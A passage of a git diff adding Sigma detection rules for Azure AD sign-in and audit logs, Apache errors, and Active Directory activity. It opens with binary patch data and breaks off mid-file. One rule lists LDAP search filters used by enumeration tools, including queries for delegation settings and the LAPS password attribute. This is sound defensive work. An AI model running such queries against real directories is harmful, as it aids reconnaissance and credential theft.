zE$i>LrOjA8YFMW2f$r6DA3n~E)JPuNVp!3B=1BhK6`0mQ>Pm38a=s7fco3gdHWW`- zCKcMVA)7UY=8o(C6}X3W9LJ|9s@`}qwke)g%bwv`wGDEst@uWQZtoF1s^QbjP{*X@ zebw<89w*fWFQ?0we=fJ zv}10rvWcsuKgxvgIebCG=jjmxVDcqxbHht5cd#&`qyHkl#2`mv)(=GwvMMkSn+X?1 zdn~i7Kb0|6j+JRmn{BCNZ@iDT5bI8Lr{k&=5=1Xt!+hej<4Ew?uYvY}5T3%9l^s1R zxW;dVj!zCIYqY5lP2sCLzJ{Npzl<_hu*|V6#LkvQHuzQ6A!Jex25ja3Ms^-hz=^cQ zWtBe;ImMpOg?d?fL5&V@k+J!CyrALhtl|R9%LCKuX5QNpLoBJ=leGO_BWmjS2418u zY47anZtZMi+Oayw)?z`mXn2Vl5+uYf#Un`;R*_ErIHkFUm-A^J$7H-kyET0Mk`T^d zL@DH1!3#wgfNgjIC>K&@1uZ1VpyI1SWg5@pypB z5!^5-=85!;OUi9X9UJtTQbz;&^uN}w5Ns`ox>!H#ve9E5I~Ib2`CJ;$ur9iQ7u4s` zpI722qN=+rBYJR)G3d4dYuMhR`FTEpbwiT!m;y_5dH*zrr}QomyGdoeJYhOjiio0#}8N>95xa|=GI=7-|q2Ol@o~wgC|-&kK%OqTcYGlsA|LO?Wv3ec znMMCttrtxtxj&TV&P~LyQUmd5q}9HtWR%rR2tUNEI&M(>o9Ze4yWokU9Lt5T(9Q=Z zA;#+&*<-U+@g}d0so_5a*9N4Lmnb^{xl3&jB%|Cb`Vsz9`G@~vzapq}b|d2_+z%=a zW?O1tFqPr%Lwj;?$O_?Y{I`PqF6+>IClc(v=aQu`3k$X)SL20_kd#Q7CZ&Q%faJ+6 zLzi+@f@`dLJJ|(PfHYkyq>`Bs-)&5)Z7b$umwIgkJ0tU4COx%O>7uKCjlSRU&^wi9 zR&Z)`nJTq{D#GdF24al4t6(Vs1!x>kRPLM>1*}e&X)>J=fxtS9jJ3ngXuIR8ahavf z;$x&enX!zdWzU+S%S<(^W^5^HN~MJ5a!qCx(ZX=VSPF+0F z6$icw`+(V>S)N2SVU`dG5E2CK-pE}NS>!8K>4>Fs0& zyeTc8LwwG;z?p+_V6^4TBTW@Y-14+|IX!-*L&9de6%R-zvbjBDKA6 zGu&^DlciVr-fsMmlPiR*dWNK1=>B$iHJj~99R_9;levMoz`sP7w?52SZfnw0bOPkz zXSynTb$P#V4{>Td$u{=@Guzf=>_)YP!81bbA=xealtaBu(7n)g`2P0N#c|s{{W0LR zj);=|9SYd$S?CvT?-VV`VJv6FU2tnUKWg zpeEdfoHtfH$CHOs2hB)_t$rM6u-nWY*D+lZ!hOan_SL*sf;aqfa%VcgZ!(fG_8;pz zQmKPOg9RGsK5^zuROym`c<~<{loQYO`xh5-n~_L#F(Yr8Iz_l8m*bT@Me`BszN(ef z)N(vgXsEK?B9M)xx+(5dxQ_6y*prz4>DGi=%*ke5^tqWC|?%+-C1SwR@`e6Is)=C)r)GPXd}5O&;csO5UOinT96Z zg`GX|P(~fcjx_l+w;cm|;EH|n!)=;8CTJ{vHrtRnhvT?N&$B2i)r9JApTh99UxNuE zNq1IF*U`!D#}-qacqD_kgS$FFN`6{mhXxO)>&@zy)GxtY7QUrC#>7*R>Nq9uO4PYS z`^r;?yjJq53OdJC^QnPX^{=u{&Z6ceOn;FNC78kADfXx9Fw=emKJk>LJ8c=SYGQfg z2*P7iLYxY$Kp9rr)6{Sd!sWPvR|Vio{wlmZ9I5D>ssJ=Ly^Pt7i(bZ@F;GmE`1yMN zt|rONs6mSja*i|21xWz*@)Vk>>R2Vg(re>tUhDa;1lK5ZB|ql3sidHN(d(GI=p5z? z&SMd94%e07ELNVwni9N*1WEqeu} zJ*8o77`Jqt#g22>TY_-KD2$%EXeqyqz&wlob4Zrp#Zg#2;mQ#lZmuHA8AQpm8c(1) zTon$T!-q?FXsB72=4yxJaM^j>rHKAm2~MF?On^ia@8+m^d zAu3h;0&0~YJq6(1D|l7u8SlQuJ8B^BUgI70i+4YdUr?&VyI;gFQ5V(SFXMG(8@&4! z+)M>hci+aZ(lQpvJbZ_9E4h}R;MaH;;tF0M#jnz8&frn}I=)LY7{Lkr2BB1Q9j*9H zeyt(Jv+-N_ZK~?;kk0MO>InB0{BD-IH?!2e=~DM?&iAmsmBsp27VBHY>R@=2aDSh0 z7olR_dJPNS!PWeA?wsGbe0~>8G(4q&TL=r@hBDLdk;|Sj{Gn}ocaR^-xUL+<_j{U3 z&*G0q@E4t9;$FOH7=NtC z&6T70k!?OdZVrv&?VfOG1n)FgjpDtYa9L>4un7OA42!z0=HDg!yY#eN#>?!oaMf9v zH%;c#-fb4h!e)I`nmBX1EUsKkW6)(pBHzgJ;a)md;BgA+Bz?&#s{Kh^h0pVR=}8LZ zi#(tCC9KDnv5D$_6TX6Wd=*=`(r&JGH=g79yys~GU#IH7fIgm5=%+~x;4}vD5;9b+ zBb<9X73)qqq`Q@o(?#9OjrIHRP25j4dVosyAipakxX0mDmjB0X1y%e%ZY#WU!^drf zS5Ef0EgdED-n2zaLySp|sWwjyg>*L|{7mQfuS@lfA#VyonudSr#Hq&lugr>v6e zsgAc}x~!IF%2Y{q2IZ(=yn(kUe|x61pt3fkGBmzX&VH>eb6|QSMRH!&0!_oRepogQ zOZ#*D?vFS7?e#hOGF`SvCxoz=mKBDzZ6a8G1z|Crb74K^hR7AtT-NwHW;eZ#S&JLb zO4ljWxmT^}S=Q{$WuvmYhibEDaky+mZf!0PmyapN4CPhmB}(xmrtvt|JbV^Q@wAQH z30Et`pm~(?zooLDY%k;YQi)28GnGwOqx2nIMZ;akKc2P|Q*lLlrH|K@{J$cS96l(A zBxB!Mazu{VcOR4w%SY_HJLGP;M?S%f^#S+ylbqYgBKaXXE+-I{N90j?d|g<=>`I;%&2xVW?y`wY#B6`BUlx zq7Qz6A7$CuO;ADz=u6M^^z`XIJw5&N*Y_U)maw8AKv=Nsf@YP4=?L964m3v?62QLud9nV9S z3Tqm##A`?5D{g%D%n_C~GtiGNma2b&*KXFr=s_<-_3=K$mVONKE`T8q?jxTCSfBWU z;cvJ}$Rradn0l8y#e-lld4jo9Jp9BLf~bX=^qhtmbeKU$7;2P(##kF?8TGd1_RID5&!@I literal 0 HcmV?d00001 diff --git a/bin/main/rules/ad_ldap/azure_aad_secops_signin_failure_bad_password_threshold.yml b/bin/main/rules/ad_ldap/azure_aad_secops_signin_failure_bad_password_threshold.yml new file mode 100644 index 000000000..c34e90a3e --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_aad_secops_signin_failure_bad_password_threshold.yml @@ -0,0 +1,27 @@ +title: Sign-in Failure Bad Password Threshold +id: dff74231-dbed-42ab-ba49-84289be2ac3a +description: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. +author: Corissa Koopmans, '@corissalea' +date: 2022/04/21 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50126 + ResultDescription: Invalid username or password or Invalid on-premises username or password. + filter_computer: + TargetUserName|endswith: '$' + condition: selection and not filter_computer +falsepositives: + - Failed Azure AD Connect Synchronization + - Service account use with an incorrect password specified + - Misconfigured systems + - Vulnerability scanners +level: high +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/ad_ldap/azure_aadhybridhealth_adfs_new_server.yml b/bin/main/rules/ad_ldap/azure_aadhybridhealth_adfs_new_server.yml new file mode 100644 index 000000000..96daf5118 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_aadhybridhealth_adfs_new_server.yml @@ -0,0 +1,27 @@ +title: Azure Active Directory Hybrid Health AD FS New Server +id: 287a39fc-4914-4831-9ada-270e9dc12cb4 +description: | + This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + product: azure + service: azureactivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection +falsepositives: + - Legitimate AD FS servers added to an AAD Health AD FS service instance +level: medium diff --git a/bin/main/rules/ad_ldap/azure_aadhybridhealth_adfs_service_delete.yml b/bin/main/rules/ad_ldap/azure_aadhybridhealth_adfs_service_delete.yml new file mode 100644 index 000000000..f30d3ebd6 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_aadhybridhealth_adfs_service_delete.yml @@ -0,0 +1,27 @@ +title: Azure Active Directory Hybrid Health AD FS Service Delete +id: 48739819-8230-4de3-a8ea-e0289d1fb0ff +description: | + This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578.003 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + product: azure + service: azureactivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection +falsepositives: + - Legitimate AAD Health AD FS service instances being deleted in a tenant +level: medium diff --git a/bin/main/rules/ad_ldap/azure_ad_bitlocker_key_retrieval.yml b/bin/main/rules/ad_ldap/azure_ad_bitlocker_key_retrieval.yml new file mode 100644 index 000000000..d999c4a67 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_bitlocker_key_retrieval.yml @@ -0,0 +1,22 @@ +title: Bitlocker Key Retrieval +id: a0413867-daf3-43dd-9255-734b3a787942 +description: Monitor and alert for Bitlocker key retrieval. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: KeyManagement + OperationName: Read BitLocker key + condition: selection +falsepositives: + - Unknown +level: medium +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/ad_ldap/azure_ad_device_registration_or_join_without_mfa.yml b/bin/main/rules/ad_ldap/azure_ad_device_registration_or_join_without_mfa.yml new file mode 100644 index 000000000..65917ece4 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_device_registration_or_join_without_mfa.yml @@ -0,0 +1,24 @@ +title: Device Registration or Join Without MFA +id: 5afa454e-030c-4ab4-9253-a90aa7fac581 +description: Monitor and alert for device registration or join events where MFA was not performed. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy +logsource: + product: azure + service: signinlogs +detection: + selection: + ResourceDisplayName: 'Device Registration Service' + conditionalAccessStatus: 'success' + filter_mfa: + AuthenticationRequirement: 'multiFactorAuthentication' + condition: selection and not filter_mfa +falsepositives: + - Unknown +level: medium +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/ad_ldap/azure_ad_device_registration_policy_changes.yml b/bin/main/rules/ad_ldap/azure_ad_device_registration_policy_changes.yml new file mode 100644 index 000000000..08da8a3af --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_device_registration_policy_changes.yml @@ -0,0 +1,22 @@ +title: Changes to Device Registration Policy +id: 9494bff8-959f-4440-abce-fb87a208d517 +description: Monitor and alert for changes to the device registration policy. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'Policy' + ActivityDisplayName: 'Set device registration policies' + condition: selection +falsepositives: + - Unknown +level: high +status: experimental +tags: + - attack.domain_policy_modification + - attack.t1484 diff --git a/bin/main/rules/ad_ldap/azure_ad_sign_ins_from_noncompliant_devices.yml b/bin/main/rules/ad_ldap/azure_ad_sign_ins_from_noncompliant_devices.yml new file mode 100644 index 000000000..e5a0e7198 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_sign_ins_from_noncompliant_devices.yml @@ -0,0 +1,21 @@ +title: Sign-ins from Non-Compliant Devices +id: 4f77e1d7-3972-4ee0-8489-abf2d6b75284 +description: Monitor and alert for sign-ins where the device was non-compliant. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +logsource: + product: azure + service: signinlogs +detection: + selection: + DeviceDetail.isCompliant: 'false' + condition: selection +falsepositives: + - Unknown +level: high +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/ad_ldap/azure_ad_sign_ins_from_unknown_devices.yml b/bin/main/rules/ad_ldap/azure_ad_sign_ins_from_unknown_devices.yml new file mode 100644 index 000000000..db67bb1ea --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_sign_ins_from_unknown_devices.yml @@ -0,0 +1,24 @@ +title: Sign-ins by Unknown Devices +id: 4d136857-6a1a-432a-82ec-5dd497ee5e7c +description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +logsource: + product: azure + service: signinlogs +detection: + selection: + AuthenticationRequirement: singleFactorAuthentication + ResultType: '0' + NetworkLocationDetails: '[]' + DeviceDetail.deviceId: '' + condition: selection +falsepositives: + - Unknown +level: low +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/ad_ldap/azure_ad_user_added_to_admin_role.yml b/bin/main/rules/ad_ldap/azure_ad_user_added_to_admin_role.yml new file mode 100644 index 000000000..8888c9475 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_user_added_to_admin_role.yml @@ -0,0 +1,26 @@ +title: User Added to an Administrator's Azure AD Role +id: ebbeb024-5b1d-4e16-9c1c-917f86c708a7 +description: User Added to an Administrator's Azure AD Role +author: Raphaël CALVET, @MetallicHack +date: 2021/10/04 +references: + - https://attack.mitre.org/techniques/T1098/003/ + - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ +logsource: + product: azure + service: activitylogs +detection: + selection: + Operation: 'Add member to role.' + Workload: 'AzureActiveDirectory' + ModifiedProperties.NewValue|endswith: + - 'Admins' + - 'Administrator' + condition: selection +falsepositives: + - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. +level: medium +status: experimental +tags: + - attack.persistence + - attack.t1098.003 diff --git a/bin/main/rules/ad_ldap/azure_ad_users_added_to_device_admin_roles.yml b/bin/main/rules/ad_ldap/azure_ad_users_added_to_device_admin_roles.yml new file mode 100644 index 000000000..0a211a1c8 --- /dev/null +++ b/bin/main/rules/ad_ldap/azure_ad_users_added_to_device_admin_roles.yml @@ -0,0 +1,27 @@ +title: Users Added to Global or Device Admin Roles +id: 11c767ae-500b-423b-bae3-b244450736ed +description: Monitor and alert for users added to device admin roles. +author: Michael Epping, '@mepples21' +date: 2022/06/28 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: RoleManagement + OperationName|contains|all: + - 'Add' + - 'member to role' + TargetResources|contains: + - '7698a772-787b-4ac8-901f-60d6b08affd2' + - '62e90394-69f5-4237-9190-012177145e10' + condition: selection +falsepositives: + - Unknown +level: high +status: experimental +tags: + - attack.valid_accounts + - attack.t1078 diff --git a/bin/main/rules/ad_ldap/win_ldap_recon.yml b/bin/main/rules/ad_ldap/win_ldap_recon.yml new file mode 100644 index 000000000..d5ccf9620 --- /dev/null +++ b/bin/main/rules/ad_ldap/win_ldap_recon.yml @@ -0,0 +1,76 @@ +title: LDAP Reconnaissance / Active Directory Enumeration +id: 31d68132-4038-47c7-8f8d-635a39a7c174 +status: experimental +description: Detects possible Active Directory enumeration via LDAP +author: Adeem Mawani +date: 2021/06/22 +references: + - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726 + - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 + - https://github.com/BloodHoundAD/SharpHound3/blob/master/SharpHound3/LdapBuilder.cs +logsource: + product: windows + service: ldap_debug + definition: 'Requires Microsoft-Windows-LDAP-Client/Debug ETW logging' +detection: + generic_search: + EventID: 30 + SearchFilter|contains: + - '(groupType:1.2.840.113556.1.4.803:=2147483648)' + - '(groupType:1.2.840.113556.1.4.803:=2147483656)' + - '(groupType:1.2.840.113556.1.4.803:=2147483652)' + - '(groupType:1.2.840.113556.1.4.803:=2147483650)' + - '(sAMAccountType=805306369)' + - '(sAMAccountType=805306368)' + - '(sAMAccountType=536870913)' + - '(sAMAccountType=536870912)' + - '(sAMAccountType=268435457)' + - '(sAMAccountType=268435456)' + - '(objectCategory=groupPolicyContainer)' + - '(objectCategory=organizationalUnit)' + - '(objectCategory=Computer)' + - '(objectCategory=nTDSDSA)' + - '(objectCategory=server)' + - '(objectCategory=domain)' + - '(objectCategory=person)' + - '(objectCategory=group)' + - '(objectCategory=user)' + - '(objectClass=trustedDomain)' + - '(objectClass=computer)' + - '(objectClass=server)' + - '(objectClass=group)' + - '(objectClass=user)' + - '(primaryGroupID=521)' + - '(primaryGroupID=516)' + - '(primaryGroupID=515)' + - '(primaryGroupID=512)' + - 'Domain Admins' + suspicious_flag: + EventID: 30 + SearchFilter|contains: + - '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' + - '(userAccountControl:1.2.840.113556.1.4.803:=2097152)' + - '!(userAccountControl:1.2.840.113556.1.4.803:=1048574)' + - '(userAccountControl:1.2.840.113556.1.4.803:=524288)' + - '(userAccountControl:1.2.840.113556.1.4.803:=65536)' + - '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + - '(userAccountControl:1.2.840.113556.1.4.803:=544)' + - '!(UserAccountControl:1.2.840.113556.1.4.803:=2)' + - 'msDS-AllowedToActOnBehalfOfOtherIdentity' + - 'msDS-AllowedToDelegateTo' + - '(accountExpires=9223372036854775807)' + - '(accountExpires=0)' + - '(adminCount=1)' + - 'ms-MCS-AdmPwd' + narrow_down_filter: + EventID: 30 + SearchFilter|contains: + - '(domainSid=*)' + - '(objectSid=*)' + condition: (generic_search and not narrow_down_filter) or (suspicious_flag) +level: medium +tags: + - attack.discovery + - attack.t1069.002 + - attack.t1087.002 + - attack.t1482 diff --git a/bin/main/rules/apache_access/web_apache_segfault.yml b/bin/main/rules/apache_access/web_apache_segfault.yml new file mode 100644 index 000000000..13ad886db --- /dev/null +++ b/bin/main/rules/apache_access/web_apache_segfault.yml @@ -0,0 +1,21 @@ +title: Apache Segmentation Fault +id: 1da8ce0b-855d-4004-8860-7d64d42063b1 +status: test +description: Detects a segmentation fault error message caused by a creashing apache worker process +author: Florian Roth +references: + - http://www.securityfocus.com/infocus/1633 +date: 2017/02/28 +modified: 2021/11/27 +logsource: + service: apache +detection: + keywords: + - 'exit signal Segmentation Fault' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.impact + - attack.t1499.004 diff --git a/bin/main/rules/apache_access/web_apache_threading_error.yml b/bin/main/rules/apache_access/web_apache_threading_error.yml new file mode 100644 index 000000000..fdbf79f30 --- /dev/null +++ b/bin/main/rules/apache_access/web_apache_threading_error.yml @@ -0,0 +1,18 @@ +title: Apache Threading Error +id: e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c +status: test +description: Detects an issue in apache logs that reports threading related errors +author: Florian Roth +references: + - https://github.com/hannob/apache-uaf/blob/master/README.md +date: 2019/01/22 +modified: 2021/11/27 +logsource: + service: apache +detection: + keywords: + - '__pthread_tpp_change_priority: Assertion `new_prio == -1 || (new_prio >= fifo_min_prio && new_prio <= fifo_max_prio)' + condition: keywords +falsepositives: + - 3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185 +level: medium diff --git a/bin/main/rules/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml b/bin/main/rules/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml new file mode 100644 index 000000000..a914ca337 --- /dev/null +++ b/bin/main/rules/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml @@ -0,0 +1,27 @@ +title: Sign-in Failure Bad Password Threshold +id: dff74231-dbed-42ab-ba49-83289be2ac3a +description: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. +author: Corissa Koopmans, '@corissalea' +date: 2022/04/21 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50126 + ResultDescription: Invalid username or password or Invalid on-premises username or password. + filter_computer: + TargetUserName|endswith: '$' + condition: selection and not filter_computer +falsepositives: + - Failed Azure AD Connect Synchronization + - Service account use with an incorrect password specified + - Misconfigured systems + - Vulnerability scanners +level: high +status: experimental +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/azure/azure_aadhybridhealth_adfs_new_server.yml b/bin/main/rules/azure/azure_aadhybridhealth_adfs_new_server.yml new file mode 100644 index 000000000..7ea030282 --- /dev/null +++ b/bin/main/rules/azure/azure_aadhybridhealth_adfs_new_server.yml @@ -0,0 +1,27 @@ +title: Azure Active Directory Hybrid Health AD FS New Server +id: 288a39fc-4914-4831-9ada-270e9dc12cb4 +description: | + This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + product: azure + service: azureactivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection +falsepositives: + - Legitimate AD FS servers added to an AAD Health AD FS service instance +level: medium diff --git a/bin/main/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml b/bin/main/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml new file mode 100644 index 000000000..9d1966ce1 --- /dev/null +++ b/bin/main/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml @@ -0,0 +1,27 @@ +title: Azure Active Directory Hybrid Health AD FS Service Delete +id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff +description: | + This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578.003 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + product: azure + service: azureactivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection +falsepositives: + - Legitimate AAD Health AD FS service instances being deleted in a tenant +level: medium diff --git a/bin/main/rules/azure/azure_account_lockout.yml b/bin/main/rules/azure/azure_account_lockout.yml new file mode 100644 index 000000000..102f1de5c --- /dev/null +++ b/bin/main/rules/azure/azure_account_lockout.yml @@ -0,0 +1,21 @@ +title: Account Lockout +id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a +status: experimental +author: AlertIQ +date: 2021/10/10 +description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +logsource: + product: azure + service: signinlogs +detection: + selection: + ResultType: 50053 + condition: selection +level: medium +falsepositives: + - Unknown +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/azure/azure_app_appid_uri_changes.yml b/bin/main/rules/azure/azure_app_appid_uri_changes.yml new file mode 100644 index 000000000..3b4020f58 --- /dev/null +++ b/bin/main/rules/azure/azure_app_appid_uri_changes.yml @@ -0,0 +1,24 @@ +title: Application AppID Uri Configuration Changes +id: 1b45b0d1-773f-4f23-aedc-814b759563b1 +description: Detects when a configuration change is made to an applications AppID URI. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Update Application + - Update Service principal + condition: selection +falsepositives: + - When and administrator is making legitmate AppID URI configuration changes to an application. This should be a planned event. +level: high +status: experimental +tags: + - attack.t1528 + - attack.persistence + - attack.credential_access diff --git a/bin/main/rules/azure/azure_app_credential_added.yml b/bin/main/rules/azure/azure_app_credential_added.yml new file mode 100644 index 000000000..21f08f9e1 --- /dev/null +++ b/bin/main/rules/azure/azure_app_credential_added.yml @@ -0,0 +1,23 @@ +title: Added Credentials to Existing Application +id: cbb67ecc-fb70-4467-9350-c910bdf7c628 +description: Detects when a new credential is added to an existing applcation. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/05/26 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Update Application-Certificates and secrets management + - Update Service principal/Update Application + condition: selection +falsepositives: + - When credentials are added/removed as part of the normal working hours/workflows +level: high +status: experimental +tags: + - attack.t1098 + - attack.persistence diff --git a/bin/main/rules/azure/azure_app_credential_modification.yml b/bin/main/rules/azure/azure_app_credential_modification.yml new file mode 100644 index 000000000..5f226d2fc --- /dev/null +++ b/bin/main/rules/azure/azure_app_credential_modification.yml @@ -0,0 +1,22 @@ +title: Azure Application Credential Modified +id: cdeef967-f9a1-4375-90ee-6978c5f23974 +description: Identifies when a application credential is modified. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ +logsource: + product: azure + service: activitylogs +detection: + selection: + properties.message: 'Update application - Certificates and secrets management' + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application credential added may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/azure/azure_app_device_code_authentication.yml b/bin/main/rules/azure/azure_app_device_code_authentication.yml new file mode 100644 index 000000000..5301f8db6 --- /dev/null +++ b/bin/main/rules/azure/azure_app_device_code_authentication.yml @@ -0,0 +1,27 @@ +title: Application Using Device Code Authentication Flow +id: 248649b7-d64f-46f0-9fb2-a52774166fb5 +status: experimental +description: | + Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. + If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. + This can be a misconfigured application or potentially something malicious. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/01 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows +logsource: + product: azure + service: signinlogs +detection: + selection: + properties.message: Device Code + condition: selection +falsepositives: + - Applications that are input constrained will need to use device code flow and are valid authentications. +level: medium +tags: + - attack.t1078 + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access diff --git a/bin/main/rules/azure/azure_app_owner_added.yml b/bin/main/rules/azure/azure_app_owner_added.yml new file mode 100644 index 000000000..54b3b92f6 --- /dev/null +++ b/bin/main/rules/azure/azure_app_owner_added.yml @@ -0,0 +1,23 @@ +title: Added Owner To Application +id: 74298991-9fc4-460e-a92e-511aa60baec1 +description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. +author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' +date: 2022/06/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add owner to application + condition: selection +falsepositives: + - When a new application owner is added by an administrator +level: medium +status: experimental +tags: + - attack.t1528 + - attack.persistence + - attack.credential_access + - attack.defense_evasion diff --git a/bin/main/rules/azure/azure_app_ropc_authentication.yml b/bin/main/rules/azure/azure_app_ropc_authentication.yml new file 